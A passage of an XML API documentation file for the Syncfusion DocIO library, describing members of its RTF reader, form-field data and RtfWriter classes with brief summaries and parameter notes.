            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.RtfParser.PictureFormat">
            <summary>
            Picture format class
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.RtfParser.ShapeFormat">
            <summary>
            Shape Format Class
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfParser.ShapeFormat.GetSize">
            <summary>
            Returns the Size of shape
            </summary>            
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfParser.ShapeFormat.Size">
            <summary>
            Gets the Size of Shape
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.FormFieldData">
            <summary>
            Represents the form fields information
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_name">
            <summary>
            represents the value of ffname token
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_helpText">
            <summary>
            Represents the value of ffhelptext
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_statusHelpText">
            <summary>
            Represents the value of ffstattext
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_formFieldType">
            <summary>
            Represents the field type w.r.t the value of the fftypeN
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_bCalculateOnExit">
            <summary>
            Represents the value of ffrecalcN
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_marcoOnStart">
            <summary>
            Represents the value of ffentrymcr
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_marcoOnEnd">
            <summary>
            Represents the value of ffexitmcr
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_enabled">
            <summary>
            Represents the value of ffprotN
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_checkboxSize">
            <summary>
            Represents the value of ffhpsN
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_checkboxSizeType">
            <summary>
            Represents the checkbox type specified by the token ffsizeN
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_defaultText">
            <summary>
            Represents the value of ffdeftext
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_stringFormat">
            <summary>
            Represents the value of ffformat
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_maxLength">
            <summary>
            Represents the value of ffmaxlenN
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.DropDownItems">
            <summary>
            Represents the collection of values of ffl control word
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_bIsListBox">
            <summary>
            Represents the value of ffhaslistboxN
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.Ffres">
            <summary>
            Represents the value of ffres
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.Ffdefres">
            <summary>
            Respresents the value of ffdefres
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.FormFieldData.m_bIsChecked">
            <summary>
            Respresents the value of ffdefres for check box
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.IsChecked">
            <summary>
            Gets/Sets the checked status of the check box
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.IsListBox">
            <summary>
            Gets or sets
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.MaxLength">
            <summary>
            Gets or sets the maximum number of character allowed in text form field.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.StringFormat">
            <summary>
            Gets or sets the string format
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.DefaultText">
            <summary>
            Gets or sets the default text for the textform field
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.CheckboxSizeType">
            <summary>
            Gets or sets the checkbox size type (Auto/Exactly)
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.CheckboxSize">
            <summary>
            Gets or sets the checkbox size. This size will be reflected only when the checkbox size is of Exactly type
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.Enabled">
            <summary>
            Gets or sets the value which protects this form field
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.MacroOnExit">
            <summary>
            Gets or sets the Macro name to execute upon exit into this form fie
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.MarcoOnStart">
            <summary>
            Gets or sets the Macro name to execute upon entry into this form fie
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.Name">
            <summary>
            Gets or ets the form field name.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.HelpText">
            <summary>
            Gets or sets the help text string.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.CalculateOnExit">
            <summary>
            Gets or sets the boolean value which represents whether the field should be calculated on exit or not
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.StatusHelpText">
            <summary>
            Gets or sets the status line text
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.FormFieldData.FormFieldType">
            <summary>
            Gets or sets the formfield type.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfFont.AlternateFontName">
            <summary>
            Get/Set the alternate font name to use if the font specified in the font table is not available. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.TabFormat.TabPosition">
            <summary>
            Gets and Sets the tab position
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.TabFormat.TabJustification">
            <summary>
            Gets and Sets the justification for the tab
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.TabFormat.TabLeader">
            <summary>
            Gets and sets the tab leader
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfColor.RedN">
            <summary>
            Gets and Sets the Red component value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfColor.GreenN">
            <summary>
            Gets and Sets the green component value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfColor.BlueN">
            <summary>
            Gets and Sets the blue component value
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.PrepareTableInfo">
            <summary>
            Represents the details for the table representation based on the paragraph level.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.PrepareTableInfo.#ctor(System.Boolean,System.Int32,System.Int32)">
            <summary>
            Updates the specified reader.
            </summary>
            <param name="reader">The reader.</param>
            <param name="prevLevel">The prev level.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfReader.ReadChar">
            <summary>
            Read a single character
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfReader.ReadImageBytes">
            <summary>
            Reads the image bytes from the stream
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfReader.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfReader.RtfData">
            <summary>
            Gets the Rtf data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfReader.Encoding">
            <summary>
            Gets the encoding.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfReader.Position">
            <summary>
            Gets and Sets the current position in data buffer.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfReader.Length">
            <summary>
            Gets and Sets the data buffer length
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.RtfWriter">
            <summary>
            Converts dls document into rtf format
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfWriter.m_fontEntries">
            <summary>
            Collection of font table entries - to avoid serialization of duplicate font entries in fonttbl
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.Write(System.String,Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Writes document to the file specified by filename
            </summary>
            <param name="fileName">Name of the file.</param>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.Write(System.IO.Stream,Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Writers WordDocument to the specified stream.
            </summary>
            <param name="stream">The stream.</param>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetRtfText(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Gets the RTF text.
            </summary>
            <param name="document">The document.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.WriteBody">
            <summary>
            Writes the body of document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildDefaultStyles">
            <summary>
            Builds the default styles.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildSections">
            <summary>
            Builds the sections.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildBackground">
            <summary>
            Builds the background.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildSection(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Builds the section.
            </summary>
            <param name="section">The section.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildSectionBodyItems(Syncfusion.DocIO.DLS.BodyItemCollection)">
            <summary>
            Builds the section body items.
            </summary>
            <param name="bodyItems">The section body item collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildBodyItems(Syncfusion.DocIO.DLS.BodyItemCollection)">
            <summary>
            Builds the body items.
            </summary>
            <param name="bodyItems">The body item collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildHeadersFooters(Syncfusion.DocIO.DLS.WHeadersFooters)">
            <summary>
            Builds the headers and footers.
            </summary>
            <param name="headerFooters">The headers footers.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildHeaderFooter(System.String,Syncfusion.DocIO.DLS.BodyItemCollection,System.String,System.Boolean)">
            <summary>
            Builds the header footer.
            </summary>
            <param name="name">The name.</param>
            <param name="collect">The body item collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Builds the paragraph.
            </summary>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildParagraphEnd(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Builds the paragraph end.
            </summary>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildCharacterFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Builds the character format.
            </summary>
            <param name="cFormat">The character format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetParagraphAlignment(Syncfusion.DocIO.DLS.HorizontalAlignment)">
            <summary>
            Gets the RTF control word for paragraph alignment.
            </summary>
            <param name="hAlignment"></param>
            <returns></returns>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildParagraphFormat(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.WParagraph,System.Boolean)">
            <summary>
            Builds the paragraph format.
            </summary>
            <param name="pFormat">The p format.</param>
            <param name="appendStyle">if it is append style, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildParagraphFormat(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Builds the paragraph format.
            </summary>
            <param name="pFormat">The p format.</param>
            <param name="appendStyle">if it is append style, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildParaSpacing(Syncfusion.DocIO.DLS.WParagraphFormat,System.Boolean)">
            <summary>
            Builds the paragraph spacing.
            </summary>
            <param name="pFormat">The paragraph format.</param>
            <param name="stylePF">The style paragraph format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildSpacing(System.String,System.Single)">
            <summary>
            Builds the spacing.
            </summary>
            <param name="attribute">The attribute.</param>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildAutoSpacing(System.String,System.Boolean)">
            <summary>
            Builds the auto spacing.
            </summary>
            <param name="value">The value.</param>
            <param name="hasSpacing">if it has spacing, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildLineSpacing(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Builds the line spacing.
            </summary>
            <param name="pFormat">The paragraph format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTextureStyle(Syncfusion.DocIO.TextureStyle)">
            <summary>
            Builds the texture style.
            </summary>
            <param name="style">The texture style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildSectionProp(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Builds the section properties.
            </summary>
            <param name="section">The section.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildPageSetup(Syncfusion.DocIO.DLS.WPageSetup)">
            <summary>
            Builds the page setup.
            </summary>
            <param name="pSetup">The page setup.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildPageNumStyle(Syncfusion.DocIO.DLS.PageNumberStyle)">
            <summary>
            Builds the page number style.
            </summary>
            <param name="pageNumSt">The page number style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildColumns(Syncfusion.DocIO.DLS.ColumnCollection)">
            <summary>
            Builds the columns.
            </summary>
            <param name="sols">The column collection.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildUnderLineStyle(Syncfusion.DocIO.DLS.UnderlineStyle,System.Text.StringBuilder)">
            <summary>
            Builds the underline style.
            </summary>
            <param name="style">The under line style.</param>
            <param name="strBuilder">The string builder.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTabs(Syncfusion.DocIO.DLS.TabCollection)">
            <summary>
            Builds all tab from tab collection.
            </summary>
            <param name="tabs">The tab collection.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildParaBorders(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Builds the paragraph borders.
            </summary>
            <param name="pFormat">The paragraph format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildPageBorders(Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Builds the page borders.
            </summary>
            <param name="borders">The borders.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildBorder(Syncfusion.DocIO.DLS.Border,System.Boolean)">
            <summary>
            Builds the border.
            </summary>
            <param name="border">The border.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildBorderStyle(Syncfusion.DocIO.DLS.BorderStyle)">
            <summary>
            Builds the border style.
            </summary>
            <param name="borderStyle">The border style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildStyleSheet">
            <summary>
            Builds the style sheet.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildStyle(Syncfusion.DocIO.DLS.Style)">
            <summary>
            Builds the style.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildStyle(System.String)">
            <summary>
            Builds the style.
            </summary>
            <param name="styleName">Name of the style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTextBorder(Syncfusion.DocIO.DLS.Border)">
            <summary>
            Builds the text border.
            </summary>
            <param name="brd">The border.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildFrameProps(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Builds the frame property.
            </summary>
            <param name="pFormat">The paragraph format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildParaListId(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Builds the paragraph list id.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="pFormat">The paragraph format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTable(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Builds the table.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTableRow(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Builds the table row.
            </summary>
            <param name="row">The table row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTRowFormat(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Builds the Table row property.
            </summary>
            <param name="row">The table row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTCellFormat(Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Builds the Table cell property.
            </summary>
            <param name="cFormat">The table cell format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTRowBorders(Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Builds the Table row borders.
            </summary>
            <param name="borders">The borders.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTCellBorders(Syncfusion.DocIO.DLS.WTableCell,Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Builds the Table cell borders.
            </summary>
            <param name="cell">The cell.</param>
            <param name="borders">The cell borders.</param>
            <param name="rowBorders">The row borders.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTableCell(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Builds the table cell.
            </summary>
            <param name="cell">The table cell.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildPadding(Syncfusion.DocIO.DLS.Paddings,System.Boolean)">
            <summary>
            Builds the padding.
            </summary>
            <param name="paddings">The paddings.</param>
            <param name="isRow">if set to <c>true</c> [is row].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildVertAlignment(Syncfusion.DocIO.DLS.VerticalAlignment)">
            <summary>
            Builds the vertical alignment.
            </summary>
            <param name="alignment">The alignment.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.CheckCellBorders(Syncfusion.DocIO.DLS.WTableCell,Syncfusion.DocIO.DLS.RtfWriter.BorderType)">
            <summary>
            Checks the cell borders.
            </summary>
            <param name="cellBorders">The table cell.</param>
            <param name="borderType">Type of the border.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildParagraphItem(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Builds the paragraph item.
            </summary>
            <param name="item">The paragraph item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildSymbol(Syncfusion.DocIO.DLS.WSymbol)">
            <summary>
            Builds the symbol.
            </summary>
            <param name="symbol">The symbol.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildFootnoteEndnote(Syncfusion.DocIO.DLS.WFootnote)">
            <summary>
            Builds the footnote/endnote.
            </summary>
            <param name="footnote">The footnote.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildFootnoteProp">
            <summary>
            Builds the footnote property.
            </summary>
            <param name="footnote">The footnote.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildEndnoteProp">
            <summary>
            Builds the endnote property.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildFieldMark(Syncfusion.DocIO.DLS.WFieldMark)">
            <summary>
            Builds the field mark.
            </summary>
            <param name="fieldMark">The field mark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildField(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Builds the field.
            </summary>
            <param name="field">The field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.InsertLineBreak(Syncfusion.DocIO.DLS.Break)">
            <summary>
            Inserts the line break.
            </summary>
            <param name="brk">The Break.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTextRange(Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Builds the text range.
            </summary>
            <param name="textRange">The text range.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.InsertBkmkEnd(Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Inserts the Bookmark end.
            </summary>
            <param name="bbkmrStart">The bookmark end.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.InsertBkmkStart(Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            Inserts the Bookmark start.
            </summary>
            <param name="bbkmrStart">The bookmark start.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTocField(Syncfusion.DocIO.DLS.TableOfContent)">
            <summary>
            Builds the toc field.
            </summary>
            <param name="toc">The toc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildPicture(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Builds the picture.
            </summary>
            <param name="pic">The picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildShapeImage(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Builds the shape image.
            </summary>
            <param name="pic">The picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildInLineImage(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Builds the Inline Image.
            </summary>
            <param name="pic">The picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.IsWmfImage(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Determine whether the image is WMF format
            </summary>
            <param name="picture"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildPictureProp(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Builds the picture property.
            </summary>
            <param name="pic">The picture.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildMetafileProp(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Builds the metafile properties.
            </summary>
            <param name="pic">The picture.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetRtfImage(System.Drawing.Image)">
            <summary>
            Gets the RTF image.
            </summary>
            <param name="image">The image.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GdipEmfToWmfBits(System.IntPtr,System.UInt32,System.Byte[],System.Int32,Syncfusion.DocIO.DLS.RtfNavigator.EmfToWmfBitsFlags)">
            <summary>
            Use the EmfToWmfBits function in the GDI+ specification to convert a 
            Enhanced Metafile to a Windows Metafile
            </summary>
            <param name="hEmf">
            A handle to the Enhanced Metafile to be converted
            </param>
            <param name="bufferSize">
            The size of the buffer used to store the Windows Metafile bits returned
            </param>
            <param name="buffer">
            An array of bytes used to hold the Windows Metafile bits returned
            </param>
            <param name="mappingMode">
            The mapping mode of the image.  This control uses MM_ANISOTROPIC.
            </param>
            <param name="flags">
            Flags used to specify the format of the Windows Metafile returned
            </param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildWrappingStyle(Syncfusion.DocIO.DLS.TextWrappingStyle,Syncfusion.DocIO.DLS.TextWrappingType)">
            <summary>
            Builds the wrapping style.
            </summary>
            <param name="style">The wrapping style.</param>
            <param name="type">The wrapping type.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildWrappingType(Syncfusion.DocIO.DLS.TextWrappingType)">
            <summary>
            Builds the wrapping type.
            </summary>
            <param name="type">The text wrapping type.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildShapeProp(System.String,System.String)">
            <summary>
            Builds the shape property.
            </summary>
            <param name="propName">Name of the property.</param>
            <param name="propValue">The property value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildHorAlignm(Syncfusion.DocIO.ShapeHorizontalAlignment)">
            <summary>
            Builds the horizontal alignment.
            </summary>
            <param name="hAlignm">The shape horizontal alignm.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildVertAlignm(Syncfusion.DocIO.ShapeVerticalAlignment)">
            <summary>
            Builds the vertical alignment.
            </summary>
            <param name="vAlignm">The shape vertical alignm.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildHiddenTextBox(System.Boolean)">
            <summary>
            Build textbox visible or not
            </summary>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildHorPos(Syncfusion.DocIO.DLS.HorizontalOrigin)">
            <summary>
            Builds the horizontal position.
            </summary>
            <param name="hPos">The horizontal position.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildVertPos(Syncfusion.DocIO.DLS.VerticalOrigin)">
            <summary>
            Builds the vertical position.
            </summary>
            <param name="vPos">The vertical position.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildShapePosition(System.Single,System.Single,System.Int32,System.Int32)">
            <summary>
            Builds the shape position.
            </summary>
            <param name="horPos">The horizontal position.</param>
            <param name="vertPos">The vertical position.</param>
            <param name="shapeW">The shape width * shape horizontal scale.</param>
            <param name="shapeH">The shape height * shape vertical scale.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTextBox(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Builds the text box.
            </summary>
            <param name="textBox">The text box.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTextBoxLineStyle(Syncfusion.DocIO.DLS.TextBoxLineStyle)">
            <summary>
            Builds the text box line style.
            </summary>
            <param name="style">The line style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildShapeLines(System.Drawing.Color,Syncfusion.DocIO.LineDashing,System.Single)">
            <summary>
            Builds the shape lines.
            </summary>
            <param name="col">The line color.</param>
            <param name="dash">The line dashing.</param>
            <param name="lineWidth">Width of the line.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildShapeFill(Syncfusion.DocIO.DLS.Background,System.Boolean)">
            <summary>
            Builds the shape fill.
            </summary>
            <param name="col">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildGradientVariant(Syncfusion.DocIO.DLS.GradientShadingVariant)">
            <summary>
            Builds the gradient variant.
            </summary>
            <param name="variant">The gradient variant.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.AppendListStyles">
            <summary>
            Appends the list styles to list table.
            </summary>
            <param name="listStyles">The list styles.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildListLevel(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Builds the list level.
            </summary>
            <param name="listLevel">The list level.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.UpdateNumberPrefix(System.String)">
            <summary>
            Updates the list numbering prefix.
            </summary>
            <param name="prefix">The prefix.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildLevelText(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Builds the level text.
            </summary>
            <param name="listLevel">The list level.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildLevelNumbers(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Builds the level numbers.
            </summary>
            <param name="listLevel">The list level.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetLevelTextLeng(System.String)">
            <summary>
            Gets the level text length.
            </summary>
            <param name="levelText">The level text.</param>
